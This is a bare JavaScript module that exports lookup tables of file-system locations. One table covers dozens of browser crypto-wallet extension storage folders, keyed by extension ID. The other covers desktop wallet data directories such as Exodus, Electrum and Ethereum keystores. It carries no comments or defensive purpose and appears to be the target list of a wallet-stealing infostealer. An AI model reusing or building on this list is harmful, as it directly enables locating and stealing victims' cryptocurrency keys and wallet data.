const GetExtension = () => {
 return {
  HarmonyOutdated: "\\Local Extension Settings\\fnnegphlobjdpkhecapkijjdkgcjhkib",
  Authenticator: "\\Local Extension Settings\\bhghoamapcdpbohphigoooaddinpkbai",
  TempleTezos: "\\Local Extension Settings\\ookjlbkiijinhpmnjffcofjonbfbgaoc",
  TerraStation: "\\Local Extension Settings\\aiifbnbfobpmeekipheeijimdpnlpgpp",
  Tokenpocket: "\\Local Extension Settings\\mfgccjchihfkkindfppnaooecgfneiii",
  "Trust Wallet": "\\Local Extension Settings\\egjidjbpglichdcondbcbdnbeeppgdph",
  "Jaxx Liberty": "\\Local Extension Settings\\cjelfplplebdjjenllpjcblmjkfcffne",
  KardiaChain: "\\Local Extension Settings\\pdadjkfkgcafgbceimcpbkalnfnepbnk",
  ExodusWeb3: "\\Local Extension Settings\\aholpfdialjgjfhomihkjbmgjidlcdno",
  PaliWallet: "\\Local Extension Settings\\mgffkfbidihjpoaomajlbgchddlicgpn",
  Metamask2: "\\Local Extension Settings\\ejbalbakoplchlghecdalmeeeajnimhm",
  MaiarDEFI: "\\Local Extension Settings\\dngmlblcodfobpdpecaadgfbcggfjfnm",
  Liquality: "\\Local Extension Settings\\kpfopkelmapcoipemfendmdcghnegimn",
  Coinbase: "\\Local Extension Settings\\hnfanknocfeofbddgcijnmhnfnkdnaad",
  Crocobit: "\\Local Extension Settings\\pnlfjmlcjdjgkddecgincndfgegkecke",
  Starcoin: "\\Local Extension Settings\\mfhbebgoclkghebffdldpobeajmbecfk",
  iWallet: "\\Local Extension Settings\\kncchdigobghenbbaddojjnnaogfppfj",
  Binance: "\\Local Extension Settings\\fhbohimaelbohpjbbldcngcnapndodjp",
  Metamask: "\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn",
  Martian: "\\Local Extension Settings\\efbglgofoippbgcjepnhiblaibcnclgk",
  Bitapp: "\\Local Extension Settings\\fihkakfobkmkjojpchpfgcmhfjnmnfpi",
  BoltX: "\\Local Extension Settings\\aodkkagnadcbobfpggfnjeongemjbjca",
  Yoroi: "\\Local Extension Settings\\ffnbelfdoeiohenkjibnmadjiehjhajb",
  Swash: "\\Local Extension Settings\\cmndjbecilbocjfkibfbifhngkdmjgog",
  Tron: "\\Local Extension Settings\\ibnejdfjmmkpcnlpebklmnkoeoihofec",
  Coin98: "\\Local Extension Settings\\aeachknmefphepccionboohckonoeemg",
  Core: "\\Local Extension Settings\\agoakfejjabomempkjlepdflaleeobhb",
  Equal: "\\Local Extension Settings\\blnieiiffboillknjnepogjhkgnoapac",
  Ever: "\\Local Extension Settings\\cgeeodpfagjceefieflmdfphplkenlfk",
  Fewcha: "\\Local Extension Settings\\ebfidpplhabeedpnhjnobghokpiioolj",
  Finnie: "\\Local Extension Settings\\cjmkndjhnagcfbpiemnkdpomccnjblmj",
  Guarda: "\\Local Extension Settings\\hpglfhgfnhbgpjdenjgmdgoeiappafln",
  Guild: "\\Local Extension Settings\\nanjmdknhkinifnkgdcggcfnhdaammmj",
  Iconex: "\\Local Extension Settings\\flpiciilemghbmfalicajoolhkkenfel",
  Kaikas: "\\Local Extension Settings\\jblndlipeogpafnldhgmapagcccfchpi",
  Keplr: "\\Local Extension Settings\\dmkamcknogkgcdfhhbddcghachkejeap",
  MEWCX: "\\Local Extension Settings\\nlbmnnijcnlegkjjpcfjclmcfggfefdm",
  Math: "\\Local Extension Settings\\afbcbjpbpfadlkmhmclhkeeodmamcflc",
  Mobox: "\\Local Extension Settings\\fcckkdbjnoikooededlapcalpionmalo",
  Nami: "\\Local Extension Settings\\lpfcbjknijpeeillifnkikgncikgfhdo",
  Nifty: "\\Local Extension Settings\\jbdaocneiiinmjbjlgalhcelgbejmnid",
  Oxygen: "\\Local Extension Settings\\fhilaheimglignddkjgofkcbgekhenbh",
  Petra: "\\Local Extension Settings\\ejjladinnckdgjemekebdpeokbikhfci",
  XDEFI: "\\Local Extension Settings\\hmeobnfnfcmdkdcmlblgagmfpfboieaf",
  "XMR.PT": "\\Local Extension Settings\\eigblbgjknlfbajkfhopmcojidlgcehm",
  XinPay: "\\Local Extension Settings\\bocpokimicclpaiekenaeelehdjllofo",
  Ton: "\\Local Extension Settings\\nphplpgoakhhjchkkhmiggakijnkhfnd",
  Phantom: "\\Local Extension Settings\\bfnaelmomeimhlpmgjnjophhpkkoljpa",
  Pontem: "\\Local Extension Settings\\phkbamefinggmakgklpkljjmgibohnba",
  Ronin: "\\Local Extension Settings\\fnjhmkhhmkbjkkabndcnnogagogbneec",
  Safepal: "\\Local Extension Settings\\lgmpcpglpngdoalbgeoldeajfclnhafa",
  Saturn: "\\Local Extension Settings\\nkddgncdjgjfcddamfgcmfnlhccnimig",
  Slope: "\\Local Extension Settings\\pocmplpaccanhmnllbbkpgfliimjljgo",
  Solfare: "\\Local Extension Settings\\bhhhlbepdkbapadjdnnojkbgioiodbic",
  Sollet: "\\Local Extension Settings\\fhmfendgdocmcbmfikdcogofphimnkno",
  Wombat: "\\Local Extension Settings\\amkmjjmmflddogmhpjloimipbofnfjih",
 };
};

const GetWallets = () => {
 return {
  AtomicWallet: "AppData\\Roaming\\atomic\\Local Storage\\leveldb",
  Ethereum: "AppData\\Roaming\\Ethereum\\keystore",
  Electrum: "AppData\\Roaming\\Electrum\\wallets",
  Bytecoin: "AppData\\Roaming\\bytecoin",
  Coinomi: "AppData\\Roaming\\Coinomi\\Coinomi\\wallets",
  Guarda: "AppData\\Roaming\\Guarda\\Local Storage\\leveldb",
  Exodus: "AppData\\Roaming\\Exodus\\exodus.wallet",
  Armory: "AppData\\Roaming\\Armory",
  Zcash: "AppData\\Roaming\\Zcash",
  Jaxx: "AppData\\Roaming\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb",
 };
};

module.exports = {
 GetWallets,
 GetExtension,
};
